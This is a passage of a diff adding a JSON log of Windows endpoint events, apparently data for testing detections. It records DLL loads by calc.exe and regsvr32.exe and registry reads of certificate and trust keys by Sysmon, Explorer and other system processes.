"image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.AppDefaults.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\SysWOW64\\uxtheme.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573244020000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 